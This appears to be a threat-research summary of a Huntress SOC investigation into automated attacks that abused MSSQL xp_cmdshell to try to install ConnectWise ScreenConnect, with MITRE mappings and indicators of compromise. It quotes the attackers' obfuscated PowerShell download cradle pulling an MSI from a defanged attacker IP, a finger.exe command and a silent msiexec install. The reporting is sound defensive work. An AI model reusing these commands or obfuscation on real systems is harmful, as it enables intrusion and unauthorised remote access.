Threat Research

MSSQL to ScreenConnect | Huntress Blog

Securonix

Huntress SOC analysts investigated alerts on endpoints running MSSQL Server and Fortinet EMS, uncovering automated attack sequences attempting to deploy a ConnectWise ScreenConnect client that ultimately failed. The investigation revealed encoded commands, PowerShell-driven download attempts, and MSI-based installation attempts across multiple endpoints, suggesting an automated playbook. #MSSQL #ScreenConnect #FortinetEMS #finger #ConnectWiseControl #PowerShell

Keypoints

  • Alerts on MSSQL Server/EMS endpoints prompted in-depth investigative timelines by Huntress.
  • The first indication was an MSSQL event ID 15281 indicating access to a stored procedure was blocked.
  • An xp_cmdshell-based sequence ran under sqlservr.exe, including a Windows command shell invocation.
  • Commands were encoded in decimal form and later decoded, with a decoded msiexec command referencing a temporary MSI file.
  • PowerShell-based download cradle attempted to fetch a ConnectWise ScreenConnect MSI from a remote host.
  • The attackers targeted a ScreenConnect installation but none appeared to succeed; a ScreenConnect instance ID and related IP were observed.
  • The activity across endpoints and customers suggests an automated playbook or scripted workflow.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The article frames initial access around exploited/public-facing exposure, noting: “The first indication of the attack was an MSSQL event ID 15281 record within the Application Event Log, indicating that access to a stored procedure was blocked.”
  • [T1059.001] PowerShell – The attacker used a PowerShell-based download cradle: “powershell -nop -c $ds = ‘D’ + ‘Own’ + ‘LOa’ + ‘DfI’ + ‘le’; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke(‘http://95.179.241[.]10:23963/Bin/ConnectWiseControl.ClientSetup.msi?e=Access&y=Guest’, ‘c:windowstemp2.msi’)”
  • [T1059.003] Windows Command Shell – The attack involved invoking Windows cmd.exe: “C:Windowssystem32cmd.exe” /c FINGER [email protected][.]82[.]”
  • [T1218.007] Msiexec – MSI installation attempts are seen: “msiexec /q /i c:windowstemp1.msi”
  • [T1027] Command Obfuscation – Commands were encoded by converting each character to its decimal equivalent, separated by “+”: “two commands encoded by converting each character to its decimal equivalent, separated by ‘+’.”
  • [T1219] Remote Access Software – The operation culminates in attempts to install and connect a ScreenConnect/ConnectWise instance: “installer started and immediately stopped” and references to “ConnectWiseControl.ClientSetup.msi” on a remote host.

Indicators of Compromise

  • [IP Address] context – 185.56.83.82, 95.179.241.10
  • [URL] context – http://95.179.241[.]10:23963/Bin/ConnectWiseControl.ClientSetup.msi?e=Access&y=Guest
  • [File name] context – 1.msi, m.msi, ConnectWiseControl.ClientSetup.msi
  • [Process/Executable] context – finger.exe, cmd.exe, powershell, msiexec.exe, sqlservr.exe

Read more: https://www.huntress.com/blog/mssql-to-screenconnect

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint